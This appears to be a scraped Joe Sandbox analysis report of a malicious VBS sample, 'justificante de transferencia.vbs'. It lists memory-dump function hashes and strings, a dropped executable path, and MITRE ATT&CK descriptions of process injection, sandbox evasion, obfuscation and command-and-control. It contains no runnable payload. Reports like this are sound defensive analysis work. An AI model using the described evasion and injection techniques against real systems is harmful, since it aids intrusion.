Opcode Fuzzy Hash: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
Instruction Fuzzy Hash: 06900221611C0042D20075684C14B07001597D0303F56C215B0158554CC91989626621

Function 01A22F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
Instruction ID: e2dea06492df0d8403aff3fe1b3b52050da518b460b6db0d07b0d2d11ca15833
Opcode Fuzzy Hash: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
Instruction Fuzzy Hash: 7490026174140442D10071584414B060015D7E1301F56C115F1068554DC61DCD537226

Function 01A22F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d5d1c6c70c0257996e35d2f544352c3e95294eb73e5d876e8ebd880278f3f8
Instruction ID: 32892234f7644a215c61c685b9ee60fddd74b6cc5f7ae5acd2212f7dc870fc98
Opcode Fuzzy Hash: b2d5d1c6c70c0257996e35d2f544352c3e95294eb73e5d876e8ebd880278f3f8
Instruction Fuzzy Hash: FF90026161140042D10471584404706005597E1201F56C112B2158554CC52D8D626225

Function 01A22EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
Instruction ID: eb92ef0cdd945353d4be0367e3884209dacaee45e6155fd2966ecfb54085fe78
Opcode Fuzzy Hash: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
Instruction Fuzzy Hash: 5490027160140402D14071584404746001597D0301F56C111B5068554EC65D8ED67765

Function 01A22E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
Instruction ID: 697f7548111cbf2279749d5a2bf76169088c0eda347b40fbf7a8e3cb0a106016
Opcode Fuzzy Hash: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
Instruction Fuzzy Hash: A4900221A0140502D10171584404716001A97D0241F96C122B1028555ECA298A93B231

Function 01A22EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
Instruction ID: 6cd5ddd1ce4ff3a4f4ffe860e3a9138ea4cb00e8f5badd6f3b11505ea65fe198
Opcode Fuzzy Hash: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
Instruction Fuzzy Hash: BA90026160180403D14075584804707001597D0302F56C111B2068555ECA2D8D527235

Function 01A22E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
Instruction ID: 55feef0a563d0788c4d7d8bea80b39857f483b2ad65aeeb25160721b3b375058
Opcode Fuzzy Hash: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
Instruction Fuzzy Hash: 7F90022170140402D102715844147060019D7D1345F96C112F1428555DC6298A53B232

Function 01A22C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c1b24cbec5792fd382b899b0fad3b6d31dc7ce697c07307ba33e4d4d09c12b9c
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01A22890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A2293C
___swprintf_l.LIBCMT ref: 01A2295E
___swprintf_l.LIBCMT ref: 01A229A3
___swprintf_l.LIBCMT ref: 01A5A52E

Strings

:%u.%u.%u.%u, xrefs: 01A5A5B8
ffff:, xrefs: 01A5A504
::%hs%u.%u.%u.%u, xrefs: 01A5A527
::ffff:0:%u.%u.%u.%u, xrefs: 01A5A54E

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a775ecd4f8d6c286caa672fd4d0c7f0f2fe062797e1789543e716930152a21da
Instruction ID: 7afe379f24508fada484ae006d6a3d229e590ff5ea9fd91601a20aa65ac3b238
Opcode Fuzzy Hash: a775ecd4f8d6c286caa672fd4d0c7f0f2fe062797e1789543e716930152a21da
Instruction Fuzzy Hash: B351F9B2B04126BFDB21DFAC8990A7EFBB8BB49240754C22AF459D7641D374DE0087E0

Function 01A17630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01A54713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A54655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A546FC
ExecuteOptions, xrefs: 01A546A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A54742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A54725
CLIENT(ntdll): Processing section info %ws..., xrefs: 01A54787

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: b9a3f316904a46ed4f6ed05af7f914b2175a1bbad2327f403916cedba2df271c
Instruction ID: ee08f6a45a02e9adaeabd8bab27cb0675e896dcc6c70a13e23d15e933b938854
Opcode Fuzzy Hash: b9a3f316904a46ed4f6ed05af7f914b2175a1bbad2327f403916cedba2df271c
Instruction Fuzzy Hash: 23515D3160021ABAEF11EBE9ED95FBE77B8EF18700F0404ADE605A7181EB709E418F54

Function 01A2B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A2B6BF

Strings

0, xrefs: 01A2B66F
0, xrefs: 01A2B695
+, xrefs: 01A2B65A
-, xrefs: 01A2B650

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: f894948a83b951bcc2d3f357a4970c459fd513be251a2781018e76c541f6a6c6
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 4E81AF70E062699FEF29CF6CC8917FEBBB2AF45320F1C4559D861A7291C77498408B71

Function 01A1BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A57BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A57B7F
RTL: Resource at %p, xrefs: 01A57B8E

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
Instruction ID: e4897291fc53a4f56247f85904fe3c6581e7486526a51920e2978a25662fd743
Opcode Fuzzy Hash: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
Instruction Fuzzy Hash: 9A41D1317057029FD724DF29D940B6AB7F6EF98720F100A1DF95AEB690DB31E8058BA1

Function 01A1B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A5728C

Strings

RTL: Re-Waiting, xrefs: 01A572C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A57294
RTL: Resource at %p, xrefs: 01A572A3

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
Instruction ID: b489672357395eb8de39a103302df1d7c1471e6fd944bb71b5cadf90afdc1190
Opcode Fuzzy Hash: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
Instruction Fuzzy Hash: 06410031744202AFC720CF6ACC41B6ABBB5FB98750F144619FD55EB281DB31E8028BE1

Function 01A27D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A27E8B

Strings

-, xrefs: 01A27DDD
+, xrefs: 01A27DE8

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: d9169070a3625b9e75bfc46ed2c920488a4e2d5347d37ab1d6acaa8e928a51b0
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: E291C471E042369BEB24DFADC881ABEBBB5FF64320F14451AE955E72C0D7349A40CB61

Function 019E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 019E9191
@, xrefs: 019E9175

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
Instruction ID: 51aeb877277b1048c1c36fe62723bf87b73e5d6b131ad4c6061c7ea57d4b52c5
Opcode Fuzzy Hash: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
Instruction Fuzzy Hash: C5810C75D002699BDB32CB54DD44BEAB7B8AB48754F0041DAEA1DB7280D7709E85CFA0

Function 01A6CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 01A6CFBD

Strings

@, xrefs: 01A6CF0A
@4Dw@4Dw, xrefs: 01A6CFD5, 01A6CFDA, 01A6CFF1

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Dw@4Dw
API String ID: 4062629308-3936743583
Opcode ID: 581ca99ca79b3790f265f3b3c25911640a067bee7aa16e7bb774b92dda67ffdd
Instruction ID: 2274a3964507609115032b7b4b4625d853e613837aac013293c2bff4c5fd4872
Opcode Fuzzy Hash: 581ca99ca79b3790f265f3b3c25911640a067bee7aa16e7bb774b92dda67ffdd
Instruction Fuzzy Hash: 3141E2B5E00619EFCB219FD9C940A6DBBB8FF54B50F01442EEA46DB254D774C901CB61

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report justificante de transferencia.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\temp_executable.exe

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
justificante de transferencia.vbs

Function 00BC2B28 Relevance: 1.9, Strings: 1, Instructions: 616
COMMON

Function 00BC21DF Relevance: 3.3, APIs: 2, Instructions: 326
processinjectionCOMMON

Function 00BC21FC Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00BC378C Relevance: 1.7, APIs: 1, Instructions: 242
processCOMMON

Function 00BC3DD8 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 00BC2244 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 00BC3C50 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 00BC2220 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 00BC2208 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 00BC2250 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 00BC3B89 Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Function 00BC2238 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 00BC3D20 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 00BC3EB9 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Function 00BC2268 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Function 00417663 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 01A235C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 01A22DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 01A22C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON